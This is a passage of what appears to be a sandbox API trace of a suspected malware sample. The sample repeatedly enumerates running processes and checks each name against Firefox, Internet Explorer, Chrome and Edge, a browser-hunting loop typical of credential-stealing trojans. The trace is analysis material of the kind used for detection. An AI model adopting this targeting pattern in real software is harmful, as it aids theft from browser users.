(lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0172.571] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0172.571] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0172.571] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.571] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0172.572] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0172.572] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0172.572] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0172.572] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.572] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0172.572] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0172.572] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0172.572] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0172.572] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.572] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0172.573] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0172.573] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0172.573] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0172.573] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.573] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0172.573] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0172.573] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0172.573] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0172.573] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.574] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0172.574] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0172.574] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0172.574] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0172.574] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.574] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0172.575] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0172.575] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0172.575] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0172.575] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.575] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0172.575] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0172.575] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0172.575] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0172.575] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.575] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0172.576] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0172.576] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0172.576] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0172.576] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.576] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0172.576] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0172.576] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0172.576] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0172.576] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.576] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0172.577] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0172.577] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0172.577] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0172.577] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.577] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0172.578] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0172.578] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0172.578] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0172.578] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.578] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0172.578] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0172.578] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0172.578] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0172.578] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.578] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.579] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0172.579] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0172.579] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0172.579] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.579] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.579] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.579] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.579] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.579] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.579] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0172.580] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0172.580] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0172.580] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0172.580] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.580] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.581] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.581] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.581] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.581] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.581] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0172.581] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0172.581] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0172.581] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0172.581] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.581] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0172.582] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0172.582] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0172.582] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0172.582] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.582] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.582] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.582] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.582] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.582] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.582] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0172.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0172.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0172.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0172.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.583] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0172.583] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0172.583] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0172.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0172.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.584] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.584] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.584] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.584] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.584] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.584] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.585] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.585] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.585] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.585] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.585] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.585] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.585] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.585] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.585] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0172.586] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0172.586] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0172.586] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0172.586] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0172.586] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0172.587] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0172.587] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0172.587] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0172.587] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0172.587] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 0 [0172.587] CloseHandle (hObject=0xd4) returned 1 [0172.587] Sleep (dwMilliseconds=0x3e8) [0173.590] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0173.592] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.593] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0173.593] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0173.593] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0173.593] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0173.593] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.594] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0173.594] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0173.594] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0173.594] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0173.594] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.594] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0173.594] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0173.594] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0173.594] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.594] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.595] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0173.595] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0173.595] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0173.595] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.595] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.595] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0173.595] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0173.595] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0173.595] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.595] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.596] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0173.596] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0173.596] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0173.596] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.596] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.597] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0173.597] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0173.597] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0173.597] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.597] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.597] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0173.597] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0173.597] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0173.597] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.597] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.598] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0173.598] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0173.598] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0173.598] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.598] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0173.598] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0173.598] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0173.598] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0173.598] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.598] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.599] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.599] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.599] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.599] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.599] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.599] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.599] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.599] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.600] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.600] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.600] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.600] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.600] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.600] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.600] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.601] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.601] lstrcmpiA 